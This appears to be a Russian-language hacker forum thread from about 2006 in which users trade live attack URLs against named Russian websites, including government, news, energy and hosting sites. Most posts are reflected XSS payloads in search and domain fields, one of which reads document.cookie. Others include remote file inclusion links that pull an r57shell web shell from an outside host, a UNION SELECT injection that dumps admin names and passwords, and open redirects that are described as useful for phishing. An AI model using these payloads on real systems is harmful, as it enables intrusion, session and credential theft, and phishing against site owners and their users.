_http://avtoprice.com/cgi-bin/search.pl Поиск : <script>alert()</script> _http://www.autobriz.ru/cgi-bin/catalog-find.pl?CMD=FIND&WORDS=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
Вот ловите http://www.hithost.ru/cgi-bin/game_1_10.cgi?sid=5668431270%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb%20src=%22 может тому кто сайт расскручивает и пригодиться, d1mon - это тебе )) ггг..
XSS Поисковая система KM.RU _http://go.km.ru/index.asp?idr=0&ids=&wdv=0&mrv=1&dti=0&dtv=3&idt=&ann=1&srt=0&itp=-1&osq=&P1=&P2=&P3=&ext=0&opt=0&hlp=0&sr=0&sq=%3Cscript%3Ealert%28%29%3C%2Fscript%3E РИА Новости _http://www.rian.ru/search/?query=%22%3Esa%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=8&y=1 Lenta.ru _lenta.ru в поиске: "><script>alert ()</script> ГАЗПРОМ.ру _http://www.gazprom.ru/cgi-bin/htsearch - в поиске: "><script>alert ()</script> Болеро.ру _http://www.bolero.ru в поиске: "><script>alert ()</script> CyberFight.ru _http://cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&mode=simple kino.ru _http://www.kino.ru/search.php - в поиске: <script>alert ()</script> РБК _http://av.rbc.ru/?query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&type=&morph=on&cat=&d1=13&m1=02&y1=2006&d2=13&m2=03&y2=2006&howmany=10&sort=date
XSS Сайт Правительства России (government.ru) _http://www.government.ru - в поиске: "><script>alert ()</script> Rambler: Фото _http://foto.rambler.ru - в поиске: "><script>alert ()</script> Правда.ру _http://pravda.ru - в поиске: "><script>alert ()</script> Referat.com _http://links.referat.com/?hp=0&st=%3Cscript%3Ealert+%28%29%3C%2Fscript%3E RuPay.ru _http://rupay.ru - /подписка на новости/ - /ваш email/ - вписываем туда: "><script>alert ()</script> Ren-TV.com _http://ren-tv.com - /поиск/ - "><script>alert ()</script>
VolkIncor 1)http://www.strelna.org.ru/main.php?page=http://casperskyj.narod.ru/r57shell.txt 2)http://sync.te.ua/index.php?page=http://casperskyj.narod.ru/r57shell.txt
XSS прошелся по хостингам Netco _http://www.netco.ru - Зарегистрировать домен -> <script>alert ()</script> Standarthost _http://www.standarthost.ru - Проверка домена -> <script>alert ()</script> [.m]masterhost _http://masterhost.ru - Проверить домен -> "><script>alert ()</script> Terrahost _http://www.terrahost.ru/whois/whois.php?domain=%22%3E%3Cscript%3Ealert+%28%29%3C%2Fscript%3E&ru=on MASTAK _http://www.mastak.ru/Mwois/mwhois.php?domain=<script>alert%20()</script>
h16.ru http://s.agava.ru/cgi/g.cgi?p=150&u=mail.ru http://www.agava.ru/cgi/g.cgi?p=134&u=http://www.mail.ru
Уже посерьезнее, эту можно использовать для фишинга... Как и предыдущую... Остальные бесполезны практически...
_http://kaiser.su/index.html?form=' _http://saratov.cityout.ru/search/?fastsearch=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=0 Links
Code: http://kaiser.su/index.html?form=index&href=223344&class=-5%20union%20select%201,concat(name,':',password),3,4,5,6,7,8,9,10,11%20from%20admin/*
31.03.2006 20:11 хорошее начало - http://www.rambler.ru/cgi-bin/pic.cgi?words="><script>alert(/VectorG/)</script>
багу нашёл около 3х недель назад говорили с киборгом в мирке на счёт этого дела, итог: бага ниче не даёт... но всё равно интересная реализация: http://afisha.yandex.ru/event.xml� http://money.yandex.ru/shops.xml� и так во многих xml яндекса, но не во всех...
На http://ha.ckers.org/xss.html если ввести в поле: HTML (with semicolons): текст %Wd то выскакивает алерт, правда не понял почему и какая от этого польза.
